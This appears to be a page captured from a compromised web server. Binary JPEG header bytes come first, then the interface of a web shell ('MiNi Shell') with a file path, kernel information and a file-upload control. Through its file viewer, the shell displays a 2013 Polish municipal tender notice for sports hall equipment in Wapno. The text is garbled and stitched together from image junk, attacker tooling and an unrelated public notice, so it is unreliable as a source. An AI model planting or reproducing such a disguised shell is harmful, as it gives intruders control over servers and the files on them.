JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130220/73132-N-2013.html

<p class="kh_header"><b>Wapno: Dostawa i montaż wyposażenia w ramach projektu pn. Budowa sali sportowej przy Zespole Szkół w Wapnie Gmina Wapno</b><br>
<b>Numer ogłoszenia: 73132 - 2013; data zamieszczenia: 20.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Świerczewskiego 1A, 62-120 Wapno, woj. wielkopolskie, tel. 067 2611459, faks 067 2611019.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wapno.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia w ramach projektu pn. Budowa sali sportowej przy Zespole Szkół w Wapnie Gmina Wapno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż wyposażenia sali sportowej wg zestawienia:
1. Ławeczka gimnastyczna drewniana o wym. dł. 200 cm x 24 cm x 31 cm (tolerancja +/- 2 cm)
    spełniająca wymogi normy EN 97063 - 4 szt.
2. Ławeczka gimnastyczna drewniana o wym. 300 cm x 24 cm x 31 cm (tolerancja +/- 2 cm) 
    spełniająca wymogi normy EN 97063 - 4 szt.
3. Ławeczka gimnastyczna drewniana o wym. 400 cm x 24 cm x 31 cm (tolerancja +/- 2 cm) 
     spełniająca wymogi normy EN 97063 - 4 szt.
4. Równoważnia gimnastyczna niska o wym. belki 300 cm x 13 cm x 16 cm (tolerancja +/- 2 cm) 
    spełniająca wymogi normy EN 12432 - 1 szt.
5. Drążek gimnastyczny. Zestaw składa się z: prężnika z obejmami i sworzniami mocującymi, 
   dwóch słupków stalowych z tulejami oraz pokryw tulei. Otwory w słupkach umożliwiają regula-
   cję wysokości zawieszenia prężnika w zakresie od 80 cm do 260 cm skokowo co 10 cm (toleran
   cja +/- 2 cm). Słupki w tulejach stabilizowane są za pomocą specjalnego docisku. Prężnik drążka
   wykonany ze stali o podwyższonych własnościach wytrzymałościowych i sprężystych. Słupki 
   lakierowane proszkowo, tuleje cynkowane. Drążek spełnia wymogi normy EN 12197 - 1 szt.
6. Drążek przyścienny. Drążek gimnastyczny przyścienny  z dociskiem 2-płaszczyznowym. W 
      skład zestawu wchodzi prężnik z obejmami i sworzniami mocującymi, listwa naścienna i słupek 
    z tuleją oraz pokrywa tulei. Słupek w tulei stabilizowany jest za pomocą specjalnego docisku.
      Słupek i listwa naścienna posiadają otwory zapewniające regulacje wysokości zawieszania pręż-
       nika w zakresie od 80 cm do 260 cm skokowo, co 10 cm (tolerancja +/- 2 cm). Spełnia wymogi 
       normy EN 12197 - 10 szt.
7. Wieszak stojący 1-stronny do szatni z ławeczką wym. 100 cm x 40 cm x 32 cm (tolerancja +/- 2 
    cm). Konstrukcja ławko-wieszaka wykonana jest z profili stalowych, malowanych lakierem 
    proszkowym. Siedzisko wykonane z drewnianych listew malowanych lakierem bezbarwnym. 
    Ławko-wieszak posiada półkę na obuwie wykonaną z profili stalowych. Wieszaki wyposażone są 
    w haki w rozstawie 15 cm (tolerancja +/- 1 cm).- 30 szt.
8. Materace o wym. 200 cm x 20 cm x 120 cm (tolerancja +/- 1 cm). Podłoże antypoślizgowe ze 
    skórzanymi narożnikami i uchwytami do transportu - 7 szt.
9. Materac o wym. 200 cm x 10 cm x 120 cm (tolerancja +/- 1 cm). Podłoże antypoślizgowe ze skó
    rzanymi narożnikami i uchwytami do transportu - 12 szt.
10. Stepper. Profesjonalne urządzenie umożliwiające trening mięśni pośladków oraz ud. Stepper 
      wyposażony jest we własny generatorowy system zasilania. Pomiar tętna odbywa się za pomocą 
      sensorów dotykowych lub pasa telemetrycznego. Urządzenie posiada 12 programów treningo-
      wych, w tym program sterowany pracą serca ćwiczącego (HRC) oraz 16-stopniową regulację 
     obciążenia, co pozwala bardzo precyzyjnie dopasować intensywność ćwiczeń do potrzeb i moż
      liwości organizmu. - 4 szt.
11. Kosz najazdowy treningowy do mini koszykówki. Konstrukcja przejezdna do koszykówki o 
      wysięgu 125 cm, do tablic 105 cm x 180 cm, płynna regulacja wysokości w zakresie 200-260-
      305 cm (tolerancja +/- 2 cm), osłony bezpieczeństwa, kółka obrotowe, obciążenia walizkowe. 
      Tablica do koszykówki profesjonalna 180 x 105 cm, szkło akrylowe grubość 10 mm (tolerancja 
      +/- 1 m), osłona dolnej krawędzi. Obręcz do koszykówki wzmocniona. Kosze boczne treningo-
      we. Zestaw wyposażony jest w balast, dodatkowo całość mocowana jest do posadzki hali za 
      pomocą maskowanego uchwytu. - 2 szt.
12. Krzesło sędziowskie (siatkówka). Wykonane z cienkościennych rur stalowych, malowane lakie-
      rem proszkowym. Posiada mechaniczną regulację wysokości podestu oraz kółka ułatwiające 
      transport - 1 szt.
13. Bramka do piłki nożnej halowej wraz z montażem do podłoża, profil aluminiowy 8 x 8 cm (to-
      lerancja +/- 2 cm), wys. 208 cm, szer. 516 cm, głębokość max 100 cm - 2 szt.
14. Siatka do bramki do piłki nożnej - 2 szt.
15. Bramka do piłki ręcznej aluminiowa profil 8 x 8 cm (tolerancja +/- 1 cm) wraz z montażem do 
      podłoża, wysokość 208cm, szer. 316 cm, głębokość max 100 cm - 2 szt.
16. Siatka do bramki do piłki ręcznej  - 2 szt.
17. Krzesło drewniane składane - 10 szt.
18. Stolik sędziowski z płyty meblowej. Kolor buk wym. 150 cm x 75 cm x 70 cm (tolerancja +/- 2 
        cm) - 2 szt.
19. Zestaw do siatkówki. Słupki aluminiowe wykonane ze specjalnego profilu aluminiowego o 
      konstrukcji zapewniającej wysoką sztywność na zginanie. Profil aluminiowy 70 x 120 mm (to
      lerancja +/- 1 cm). Urządzenie naciągowe w całości znajduje się wewnątrz profilu aluminiowe
      go. Konstrukcja słupków umożliwia ustawienie siatki na dowolnej wysokości w przedziale 106 
      - 250 cm (tolerancja +/- 1 cm). Blokowanie wysokości naciągu (siatki) dokonywane jest po
      przez zacisk mimośrodowy z wkładką teflonową. Składana korbka naciągowa jest zintegrowana 
      ze słupkiem, po naprężeniu siatki jest prostowana i chowana wewnątrz profilu. Osłony słupków 
      wykonane z gąbki osłoniętej materiałem typu skaj, całość zamocowania na rurze PCV. Wyso-
      kość - 200 cm (tolerancja +/- 1 cm). Siatka turniejowa do siatkówki, bezwęzłowa z polipropyle-
      nu o wysokiej wytrzymałości, śr. min 3 mm, z linką kewlarową (dł. 11,70 m), krawędzie 
      wzmocnione włóknem szklanym, linki naprężające w 6 punktach. Taśma wzmacniająca biała:  
      górna z poliestru o szer. 70 mm, dolna z polipropylenu o szer. 50 mm. Kolor czarny. Tuleja 
      montażowa słupka aluminiowego profesjonalnego, przeznaczona do mocowania aluminiowych 
      słupków do siatkówki, z naciągiem wewnętrznym. Dekiel podłogowy maskujący otwory wyko
      nane w posadzce w celu osadzenia tulei mocujących słupki. - 4 kpl.
20. Biurko z płyty meblowej. Kolor buk wym. 135 cm x 74,5 cm x 70 cm (tolerancja +/- 2 cm) - 4 
      szt.
21. Szafa ubraniowa z płyty meblowej. Kolor buk wym. 70 cm x 180 cm x 60 cm (tolerancja +/- 2 
       cm)- 3 szt.
22. Szafa ubraniowa z płyty meblowej. Kolor buk, wym. 70 cm x 180 cm x 40 cm (tolerancja +/- 2 
       cm)- 1 szt.
23. Szafa do akt z płyty meblowej. Kolor buk, wym. 70 cm x 108 cm x 40 cm (tolerancja +/- 2 cm)
       - 3 szt.
24. Regał otwarty z płyty meblowej. Kolor buk, wym. 70 cm x 108 cm x 40 cm (tolerancja +/- 2 
      cm)- 1 szt.
25. Witryna z płyty meblowej. Kolor buk, wym. 70 cm x 108 cm x 40 cm - 2 szt.
26. Krzesło obrotowe, miękkie podłokietniki, regulowana wysokość krzesła, podstawa na kółkach -
     2 szt.
27. Koń gimnastyczny, wym. 160 cm x 110 cm x 75 cm, (tolerancja +/- 1 cm) spełniający wymogi 
    normy EN 12196 - 1 szt. 
28. Odskocznia gimnastyczna, wym. 120 cm x 20 cm x 80 cm, (tolerancja +/- 2 cm) spełniająca 
      wymogi normy EN913 - 2 szt.
29. Skrzynia gimnastyczna 5-częściowa wym. 150 cm x 100 cm x 45 cm (tolerancja +/- 2 cm) - 4 
      szt.
30. Kozioł gimnastyczny, wym. 85 cm x 150 cm x 75 cm, (tolerancja +/- 2 cm) spełniający wymogi 
      normy EN 12196 - 1 szt.
31. Wózek do materacy, konstrukcja stalowa, lakierowany proszkowo, nogi na kółkach skrętnych, 
      wym. 200 cm x 75 cm x 120 cm (tolerancja +/- 1 cm)- 2 szt.
32. Smith maszyna. Wyciskanie sztangi w prowadnicach. Konstrukcja stalowa pokryta farbą prosz-                              kową. Wymiary długość: 135 cm, szerokość: 225 cm, wysokość: 220 cm, (tolerancja +/- 2 cm) waga maszyny 100- 220 kg  - 1 szt.
33. Wyciąg z góry z podparciem pod uda. Maszyna do ćwiczeń siłowych - 1 szt.
34. Maszyna do podciągania ramion z podparciem pod klatkę piersiową. Maszyna do ćwiczeń siło-
       wych  - 1 szt.
35. Maszyna do ćwiczeń mięśni bioder siedząc. Maszyna do ćwiczeń siłowych - 1 szt.
36. Ławka do ćwiczeń mięśni brzucha z podkurczonymi nogami - 1 szt.
37. Trenażer wioślarski z komputerkiem. Profesjonalny - 1 szt.
38. Maszyna do ćwiczeń mięśni piersiowych - motyle przywodziciel. Maszyna do ćwiczeń siłowych - 
      1 szt.
39. Maszyna do ćwiczeń mięśni piersiowych - motyl odwodziciel. Maszyna do ćwiczeń siłowych - 1
      szt.
40. Sztangielki stałe. Waga od 2 do 37 kg po 2 szt. - 40 szt.
41. Obciążniki odlewane. Waga 1,25 kg - 4 szt., 2,5 kg -4 szt., 5,0 kg - 4 szt., 10,0 kg - 4 szt., 20,0 kg - 4 szt., 25,0 kg - 4 szt. - razem 24 szt.
42. Wieszak szatniowy wolnostojący, dł. 200 cm na 20 osób - 5 szt
43. Maszyna myjąco-zbierająca, zasilanie 230V, 50 Hz, szerokość mycia min. 500 mm, szerokość 
    odsysania min. 760 mm, zbiornik roztworu myjącego i brudnej wody min. 45 l, zapotrzebowanie 
    na energię elektryczną max 1200W. Maszyna powinna być wyposażona w trzymak pada wraz z 
    padem oraz hamulec, elektryczny czujnik wypełniania zbiornika brudnej wody i przeźroczysty 
      wąż do kontroli poziomu i opróżniania zbiornika roztworu myjącego - 1 szt.
44. Wykładzina zabezpieczająca posadzkę sportową. Rolki o grubości min1mm, max 1,5 mm, dłu
      gości - min. 20 m, max 30 m. Szerokość min 140 cm, max 200 cm. Odporna na zniszczenie, 
      niełamiące się brzegi, musi przylegać bezpośrednio do podłogi po jej rozwinięciu. Klasa trudno-
      palności wg normy EN 13501-1 min.Bf1-sl. - 846 m2
Dostarczone wyposażenie musi być fabrycznie nowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.42.00.00-8, 37.45.22.10-6, 37.45.29.10-3, 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  3 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożenie oświadczenia
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w oświadczeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty potwierdzajace zgodność z normami europejskimi</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany terminu wykonania w przypadku niezakończenia w terminie budowy sali sportowej.
  Termin realizacji ulegnie przedłużeniu proporcjonalnie do czasu wstrzymania robót
2. W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, nie później niż 3 dni od zaistnienia wyżej wskazanych przyczyn, poinformować o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
3. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wapno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 62-120 Wapno, ul. Świerczewskiego 1A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 11:30, miejsce: Urzad Gminy Wapno, 62-120 Wapno, ul. Świerczewskiego 1A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej - Wielkopolski Regionalny Program Operacyjny na lata 2007-2013. Zamawiający wymagać będzie należytego zabezpieczenia umowy w wysokości 5% ceny całkowitej podanej w ofercie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com